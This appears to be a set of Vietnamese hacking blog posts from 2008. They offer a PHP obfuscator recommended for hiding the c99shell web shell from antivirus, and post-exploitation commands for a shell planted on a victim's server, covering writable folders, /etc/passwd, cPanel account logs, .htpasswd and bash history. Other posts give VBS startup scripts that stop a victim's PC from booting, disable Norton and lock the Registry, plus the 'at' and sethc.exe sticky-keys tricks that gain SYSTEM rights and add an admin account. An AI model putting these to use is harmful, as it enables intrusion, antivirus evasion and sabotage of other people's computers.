Nếu chỉ dùng Hiren’s BootCD, bạn chỉ reset hay thay đổi password các tài khoản người dùng trong Windows thì Ophcrack LiveCD sẽ giúp bạn tìm ra password của các tài khoản kể cả Administrator mà không cần vào Windows. Nó sẽ tự động “soi” file SAM và SYSTEM để moi ra password.
Zend php dùng base64 Tháng Tư 2, 2008
Base64 đơn giản mà, code của bạn quá dài, thực ra chỉ cần 4 dòng. Bạn có thể mã hóa file config database:
Trích:
| <?php $str = ‘Copy nội dung file cần mã hóa vào (ví dụ nội dung file config.php)’; echo base64_encode($str); ?> |
Save thành encode.php. Run nó và copy phần nó xuất ra, copy và paste lại vào nội dung file config.php tuy nhiên phải thêm một chút để hệ thống hiểu được:
Trích:
| <?php $str = ‘Copy nội dung file đã mã hóa trên vào’; echo base64_decode($str); ?> |
Okies, mấy chú gà tây mà nhìn vào là nản, nhưng ai đọc xong rồi thì lại quá đơn giản 
Base64 không an toàn đâu.
Tháng Tư 2, 2008
copy đoạn code này vào 1 File php, Up lên Host & run –> rất tiện để Encode cho các File php vd: mã hóa File config.php hay mã hóa con c99shell để ko bị antivirus phát hiện .v..v..
Code:
<? // PHP OBFUSCATOR // (C)2003 Richard Fairthorne -- http://richard.fairthorne.is-a-geek.com // -------------------------- // Permission is granted to disctibute this file UNMODIFIED from its original // form. All other rights are reserved. function splitByNewline($string, $length) { while (strlen($string)>0) { $newstring.=substr($string, 0, $length) . "\n"; $string=substr($string, $length); } return $newstring; } echo "<big><b>Free Code Obfuscator (PHP, PERL)</b></big><br>By <a href='http://richard.fairthorne.is-a-geek.com'>Richard Fairthorne</a><hr>"; $b64_input=stripslashes($b64_input); switch($b64_action) { case "perl_encode": $output=$b64_input; $output=base64_encode($output); $output=splitByNewline($output,40); $output="#!/usr/bin/perl\nuse MIME::Base64;\neval(decode_base64('\n$output'));"; $ilength=strlen($b64_input); $olength=strlen($output); ?> <table border=0 width=100%><tr><td valign=top> <textarea rows=18 cols=60 name=done><?=$output;?></textarea> </td><td valign=top> <b>PERL code obfuscated!</b><br><br> Your PERL code has been obfuscated. <br><br> <font color=maroon> Obfuscation-Strength: Normal (Fast code execution)<br> Compatibility: 100% Code compatibility<br> Input Length: <?=$ilength;?><br> Output Length: <b><?=$olength;?></b><br> </font> <br> To use the code, simply cut and paste it in place of the old code. You may need to update the perl path. It is important to understand that code obfuscation can act as a deterrant, but is not a replacement for encryption.<br><br> <a href='?'>Click here</a> to obfuscate another page. </td></tr></table> <? break; case "php_encode": $output=$b64_input; $output=gzdeflate("?>".$output."<?",9); $output=base64_encode($output); $output=splitByNewline($output,40); $output="<? eval(gzinflate(base64_decode('\n$output'))); ?>"; $ilength=strlen($b64_input); $olength=strlen($output); ?> <table border=0 width=100%><tr><td valign=top> <textarea rows=18 cols=60 name=done><?=$output;?></textarea> </td><td valign=top> <b>PHP code obfuscated!</b><br><br> Your PHP code has been obfuscated. <br><br> <font color=maroon> Obfuscation-Strength: Normal (Fast code execution)<br> Compatibility: Zlib Required. 100% Code compatibility<br> Input Length: <?=$ilength;?><br> Output Length: <b><?=$olength;?></b><br> </font> <br> To use the code, simply cut and paste it in place of the old code. It is important to understand that code obfuscation can act as a deterrant, but is not a replacement for encryption.<br><br> <a href='?'>Click here</a> to obfuscate another page. </td></tr></table> <? break; case "php_encode_hi": $output=$b64_input; for ($b64_counter=0; $b64_counter<10; $b64_counter++) { $output=gzdeflate("?>".$output."<?",9); $output=base64_encode($output); $output="<? eval(gzinflate(base64_decode('$output'))); ?>"; } $output=gzdeflate("?>".$output."<?",9); $output=base64_encode($output); $output="<? eval(gzinflate(base64_decode('\n$output'))); ?>"; $ilength=strlen($b64_input); $olength=strlen($output); ?> <table border=0 width=100%><tr><td valign=top> <textarea rows=18 cols=60 name=done><?=$output;?></textarea> </td><td valign=top> <b>PHP code obfuscated!</b><br><br> Your PHP code has been obfuscated. <br><br> <font color=maroon> Obfuscation-Strength: Trecherous (Best Protection)<br> Compatibility: Zlib Required. 100% Code Compatibility.<br> Input Length: <?=$ilength;?><br> Output Length: <b><?=$olength;?></b><br> </font> <br> To use the code, simply cut and paste it in place of the old code. It is important to understand that code obfuscation can act as a deterrant, but is not a replacement for encryption.<br><br> <a href='?'>Click here</a> to obfuscate another page. </td></tr></table> <? break; // case "decode": // $output=htmlentities(base64_decode($b64_input),ENT_QUOTES); // break; default: ?> <table border=0 width=100%><tr><td valign=top> <form method=post> <textarea name=b64_input cols=60 rows=16></textarea><br> <SELECT name=b64_action> <OPTION value='php_encode'>PHP - Normal Strength - Compressed</OPTION> <OPTION value='php_encode_hi'>PHP - Trecherous Strength - Compressed</OPTION> <OPTION value='perl_encode'>PERL - Normal Strength</OPTION> </SELECT> <input type=submit name=submit value='obfuscate'> <!-- <input type=submit name=b64_action value=decode> --> </form> </td><td valign=top> <b>Free Code obfuscator</b><br><br> If you would like a quick way to hide your php code from prying eyes, try this PHP code obfuscator.<br><br>Copy an entire PHP page, into the obfuscator, and it will return a code that also works on any PHP server, but is not human readable.<br><br> With code 5k or bigger, you may notice that the obfuscated code is smaller than the original code. You can thank me later. </td></tr></table> <? break; } ?>
Credit : vnhack
——————————————–
Còn đây là code dùng decode, post lun cho nó trọn gói ^^
Code:
<? // REDPHOENIX89 error_reporting(FALSE); if (!$_POST['submit']) { echo "<form method=post>CODED By <b>REDPHOENIX89</b><br>Nhập đoạn code dạng <b>eval(gzinflate(base64_decode(...)))</b> vào đây : ( không có <b><? ?></b> ) <br><textarea name=code cols=80 rows=20></textarea><br><input type=submit name=submit value='DECODE'>"; exit(); } $code = stripslashes($code); decode($code); function decode($code) { $code = trim($code,' ?><? '); $code = trim($code,' ?><?php '); if (ereg("^eval\(gzinflate\(base64_decode\((.*)\)\)\);",$code)) { ob_start(); $code = str_replace('eval','echo',$code); eval($code); $s = ob_get_contents(); ob_end_clean(); decode($s); } else echo "<textarea name=code cols=80 rows=20>$code</textarea><br>Cám ơn bạn đã sử dụng CT này.<br><b>RedPhoenix89</b>"; } ?>
Credit: REDPHOENIX89
Vài lệnh khi dùng shell Tháng Tư 2, 2008
Shell thì anh em share nhiều rồi , nhưng mà bọn em newbie mô có biết dùng
Sưu tầm được vài câu lệnh xin chia sẻ cùng anh em :
find / -type f -perm -04000 -ls : tìm tất cả suid file
find / -type f -perm -02000 -ls : tìm tất cả sgid files
find / -type f -name : tìm config.inc.php
find / -type f -name \”config*\ : tìm file config
find / -perm -2 -ls”), tìm file,folders cho phép ghi
find / -type f -name service.pwd :find all service.pwd files
find / -type f -name .htpasswd :find all .htpasswd files
find / -type f -name .bash_history,: find all .bash_history files
———————————————————
netstat -an | grep -i listen :show opened ports
netstat -an :show opened ports
————————————————
cat /etc/passwd :list user
cat / etc/userdomains :View cpanel user-domains logs
cat /var/cpanel/accounting.log: View cpanel logs
cat /usr/local/apache/conf/httpd.conf : Aache configuration
cat /etc/httpd.conf :Apache configuration
cat /etc/syslog.conf :Syslog configuration
cat /etc/motd :Message Of The Day
cat /etc/httpd/conf/httpd.conf|grep ServerName
cat /etc/httpd/conf/httpd.conf
cat /etc/localdomains
cat /etc/trueuserdomains
ls -lia [đường dẫn] : để view thư mục .
VD : ls -lia /usr/www/vhost/abc.com/public_html/forum
cat /etc/passwd : để đọc file passwd
Nếu server dùng cpanel thì :
cat /var/cpanel/accounting.log : để xem các domain trên server
———————————————————————–
Giả sử ta đang hack 1 trang web , sau khi include đc 1 con shell vào website ta có 1 shell lệnh để làm việc với Linux .
okie
Vậy đầu tiên ta sẽ phải làm gì , thực hiện những lệnh gì trên con shell của ta để lấy đc thông tin cần thiết , cũng như đảm bảo sự truy cập lâu dài của ta vào sv đó (tức là việc giữ shell) . Ta biết rằng càng rút ngắn đc time thì ta càng làm đc nhiều việc trên sv cũng như tránh đc sự phát hiện của ng quản lý nhất . Chúng ta sẽ bàn về những kinh nghiệm sau khi có đc shell trên 1 sv . okie .
Tôi xin mở đầu trước . Sau khi Include đc 1 con shell vào site , Safe-mod = Off , ta dùng những lệnh gì .
+Tìm ngay thư mục có quyền ghi để Upload 1 con shell “xịn” lên sv bởi vì con shell included của ta đôi khi làm việc ko ổn định. Trên dòng command line tôi gõ :
Quote:
| find /home/victim/public_html/ -type d -perm -2 -ls |
tìm kiếm những thư mục & thư mục con có quyền writeable tính từ /home/victim/public_html/
Quote:
| find /home/victim/public_html/ -type d -perm -2 -ls |
- tìm kiếm những file ta có thể ghi đè lên tính từ /home/victim/public_html/
Ok, và lúc này Linux sẽ tự động tìm kiếm cho ta các thư mục & file có thể “chơi” đc … roài ta tiến hành Upload shell
+Tiếp theo , ta lấy thêm thông tin của sv để dùng khi cần đến , các lệnh ko thể ko biết đó là :
Quote:
| cat /etc/passwd : xem File passwd
cat /etc/domains : xem các domains trên sv |
nếu sv sử dụng cPanelX thì còn đợi gì mà ko
Quote:
| cat /var/cpanel/accounting.log |
để xem các account trên sv , nó sẽ phơi bày hết domain name & username của từng account , từ đó ta có thể dễ dàng lần ra nó ở đâu (đỡ phải mất công mò mẫm)
bạn muốn tìm user có domain là victim.com thì dùng lệnh sau:
Quote:
| cat /var/cpanel/accounting.log | grep “victim.com” |
oke, biết vận dụng các lệnh linux là đc
Lấy mấy thông tin về sv khi cần
về apache:
Quote:
| whereis apache cat /usr/local/apache/conf/httpd.conf |
về log
whereis log
Quote:
cat /etc/syslog.conf
cat /etc/hosts
em IP & domain name của server chính
Vài trò đùa với các Victim Tháng Tư 2, 2008
Khi các bạn đột nhập được vào máy người khác, tại sao không đùa với họ một tí nhỉ ?
Sau đây là một vài trò chơi do tôi nghĩ ra, bằng cách đặt một file (*.vbs) nằm trong thư mục Startup chứa một trong những đoạn script sau:
1.Trò chơi thứ nhất: không cho victim khởi động máy:
Dim wsh
Set wsh = createobject(“wscript.shell”)
wsh.run “RUNDLL32.EXE user.exe,exitwindows”
2.Trò chơi thứ hai: disable NAV( nếu có install) của họ:
Dim wsh
Set wsh= CreateObject( “WScript.Shell”)
s1 = “HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servi ces\Norton Program
Scheduler\Start”
wsh.RegWrite s1,3, “REG_DWORD”
3.Trò chơi thứ ba: hiển thị môt meesage mỗi khi họ reboot máy:
dim wsh
Set wsh = CreateObject( “WScript.Shell” )
s1 = “HKLM\Software\Microsoft\Windows\CurrentVersion\Wi nLogon\”
s2 = “LegalNoticeCaption”
s3 = “LegalNoticeText”
wsh.RegWrite s1+s2, “Hackervn.org”
wsh.RegWrite s1+s3, “Robinhood invite you to join hackervn.org”
4.Trò chơi 4: hiển thị một dòng lệnh mỗi khi họ click vào một file hay folder:
set reg=createobject(“WScript.shell”)
reg.regwrite “HKEY_CLASSES_ROOT\*\Shell\Hello I am Robinhood-come from hackervn.org\”,”"
reg.regwrite “HKEY_CLASSES_ROOT\folder\shell\Hello I am Robinhood-come from hackervn.org\”,”Robinhood”
5.Trò chơi 5: trò chơi này đảm bảo cho các trò chơi trên có thể diễn ra “vui vẻ”: disable Registry của victim:
Dim objShell
Set objShell = CreateObject( “WScript.Shell” )
s1 = “HKEY_USERS\.Default\Software\Microsoft\Windows\Cu rrentVersion\”
s2 = “Policies\System\DisableRegistryTools”
objShell.RegWrite s1+s2,1, “REG_DWORD”
Trên đây là 5 trò chơi “khá vui”, thật ra còn nhiểu trò chơi khác nũa nhưng “nguy hiểm” cho victim nên thôi.
Cướp quyền Admin trong vòng 1 phút với quyền User Tháng Ba 27, 2008
Cuop quyen admin trong vong 1 phut voi quyen User
——————————————————————————–
Trò này chơi ở trường học hoặc đến nhà bạn đẻ quậy cũng rất vui..
vd: khi đang chỉ là guest hoặc user thuờng bạn sẽ biến thành admin system trong 1 phút và làm cái gì tuỳ thích..
- Huớng dẫn :
mở hộp RUN.. hoặc nhấn nut window + R
gõ: cmd nhấn enter để mở cửa sổ DOS đen xì
sau đó gõ lệnh sau: at TIME /interactive “cmd.exe”
( TIME là giờ tính theo hệ thông cộn thêm 1 phút , vd bạn máy bạn là 10:49 pm thì time sẽ là 22:50 )
sau đó đợi một lúc nó sẽ hiện ra cửa sổ DOS khác .. đóng cái cũ lại
Sau đó nhấn nut Ctr + Alt + Delete để hiện hộp hệ thống system,,
Chọn Tab Process sau đó tìm file explorer.exe sau đó nhấn nut KILL để xoá explorer ra khỏi hệ thống ..
lúc này hệ thơng sẽ tụ động swich user ngầm và tự động đăng nhập với quyền cao nhất là Admin SYSTEM..
việc còn lại là quậy cho banh máy ra .. hee
cái nì mình luộm thui nhé nhưng cũng vui lém
Hack Password của Administrator trong Windows XP Tháng Ba 25, 2008
Hiện nay không có quá nhiều cách để phục hồi mật khẩu của tài khoản Administrator trong Windows bị quên mất. Có thể kể đến là dùng công cụ hỗ trợ của đĩa Hiren Boot để xóa trắng mật khẩu của tài khoản Administrator hay dùng các công cụ dò tìm mật khẩu trên Net. Tuy vậy, không phải lúc nào chúng ta cũng có công cụ để dùng. Nếu gặp những lúc như thế…. hãy lợi dụng lỗ hỏng của file sethc.exe trên Windows.
Giải thích thủ thuật này (cho các chuyên gia… thích suy nghĩ)
Trên Windows XP, nếu bạn nhấp phím Shift 5 lần, Windows sẽ gọi một chương trình nhỏ có tên là StickyKey. Đây là chương trình hỗ trợ người khuyết tật khi sử dụng Windows XP được đính kèm mặc đinh trong bộ tiện ích của Windows. Điều này có nghĩa là bạn có thể gọi chương trình này bằng phím tắt mà không cần đến giao diện thân thiện (1).
Nếu bạn đăng nhập bằng tài khoản có tên User1 và nhấp phím Shift 5 lần để gọi chương trình này, Windows sẽ lấy quyền của User1 để gọi chương trình StickyKey. Nếu bạn không đăng nhập vào bất kỳ một tài khoản nào mà gọi được StickyKey thì Widnows sẽ lấy quyên của hệ thống (System) để chạy StickyKey (2).
Từ giả định (1) và (2) trên, nếu bạn thay thế file thực thi của chương trình StickyKey (sethc.exe) bằng chương trình Command Run (cmd.exe) và gọi nó bằng 5 lần phím Shift mà không đăng nhập bằng tài khoản nào cả thì windows sẽ dùng quyền của Hệ thống (system) gọi file cmd.exe thay vì file sethc.exe. Thế là có thể làm bất cứ chuyện gì bằng tài khoản của cao nhất (quyền của Hệ thống) trên chương trình Command Run.
Cách thực hiện thủ thuật này: Bước 1: Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi thử chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để xem thử).
Bước 2: Vào Start >> Run >> nhập vào Notepad và Enter để gọi chương trình Notepad.exe. Copy đoạn mã của mình viết, past vào notepad, Save lại với tên là Hackpass.bat
CODE:
cd %systemroot%/system32 rename sethc.exe sethc.exe.bk copy cmd.exe sethc.exe /y
Sau đó nhấp kép chuột lên file Hackpass.bat để thực thi!
Đoạn mã này làm các nhiệm vụ sau: 1. Sao lưu lại file sethc.exe bằng cách đặt lại tên là sethc.exe.bk
2. Thay thế file sethc.exe bằng file cmd.exe Đến đây, bạn nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay vì chương trình StickyKey thì bạn đã thành công!
Chương trình StickyKey đã được thay bằng Ccmmand Run
Bước 3: Khởi động lại máy. Khi đến màn hình đăng nhập, bạn khoan hãy đăng nhập mà nhấn phím Shift 5 lần…… Lúc này chương trình Command Run xuất hiện, bạn nhập một trong những vào đoạn lệnh dưới đây
Xóa trắng password của Administrator:
CODE: net user Administrator
—- > nhấn phím Enter khi hoàn thành!
Thêm một tài khoản Admin với mật khẩu là 123 CODE: net user Admin 123 /add —- > nhấn phím Enter khi hoàn thành!
Gán tài khoản Admin vào nhóm quản trị:
CODE: net localgroup Administrators Admin /add —- > nhấn phím Enter khi hoàn thành!
Nếu bạn sử dụng đúng cấu trúc lệnh phía trên, bạn sẽ tạo được các tài khoản mới. Tại đây, bạn có thể đăng nhập vào các tài khoản mới mà không cần khởi động lại máy!
Để biết thêm thông tin về cách sử dụng Net User Command, các bạn hãy truy cập vào
http://support.microsoft.com/kb/251394
